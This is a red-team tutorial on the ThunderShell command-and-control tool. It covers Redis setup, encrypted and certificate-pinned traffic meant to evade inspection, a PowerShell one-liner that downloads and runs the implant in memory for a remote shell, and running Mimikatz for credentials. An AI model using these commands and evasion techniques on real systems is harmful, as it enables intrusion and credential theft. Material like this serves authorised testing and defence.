Command and control tools usually rely on a variety of protocols as a communication mechanism such as DNS, ICMP, HTTPS etc. Most endpoint products perform some deep packet inspection in order to drop any arbitrary connections. Using a protocol that supports encryption and pin the generated traffic with a certificate can evade the majority of the products and it should be considered as a method during red team engagement.

ThunderShell was developed by MrUn1k0d3r and it is based in Python. It uses a Redis server for HTTPS communication between the implant and the server and PowerShell for execution of the implant on the target and any other scripts. The main advantage is that supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is called PoshC2.

ThunderShell has the following dependencies:

apt install redis-server
apt install python-redis

The default.json file contains the tool configuration where traffic encryption can be enabled by setting an encryption key and pinned with a certificate to avoid detection.

ThunderShell - Configuration

ThunderShell – Configuration

When ThunderShell is executed it will start a web server which by default will listen on port 8080. The web server will handle all the HTTP requests from the implants.

ThunderShell - Console

ThunderShell – Console

The implant (PS-RemoteShell) needs to be hosted on a webserver that is controlled by the red team. The implant requires the following parameters:

  • IP – Webserver
  • Port – Webserver
  • Encryption Key
  • Delay

The following command will download and execute the implant directly from memory.

IEX (New-Object Net.WebClient).DownloadString(''); PS-RemoteShell -ip -port 8080 -Key test -Delay 2000
ThunderShell - Implant Execution

ThunderShell – Implant Execution

Once the implant is executed on the target it will communicate with the web server and a new shell will obtained.

ThunderShell - Shell

ThunderShell – Shell

Every shell has its own unique ID. The list of the active shells with their associated ID’s can be obtained with the “list” command.

ThunderShell - List Active Shells

ThunderShell – List Active Shells

Interaction with the shell is needed before the execution of any commands on the target.

ThunderShell - Interaction with the Shell

ThunderShell – Interaction with the Shell

ThunderShell has also the ability to read files, execute commands and  scripts in memory, file transfer etc.

ThunderShell - Read Files

ThunderShell – Read Files

Commands can be executed on the target like any other normal shell.

ThunderShell - Executing Commands

ThunderShell – Executing Commands

Since it is using PowerShell it is possible to execute various scripts that could enhance the capability of the tool like Mimikatz.

ThunderShell - Mimikatz Execution

ThunderShell – Mimikatz Execution

The results from Mimikatz can retrieved with the command refresh.

ThunderShell - Mimikatz

ThunderShell – Mimikatz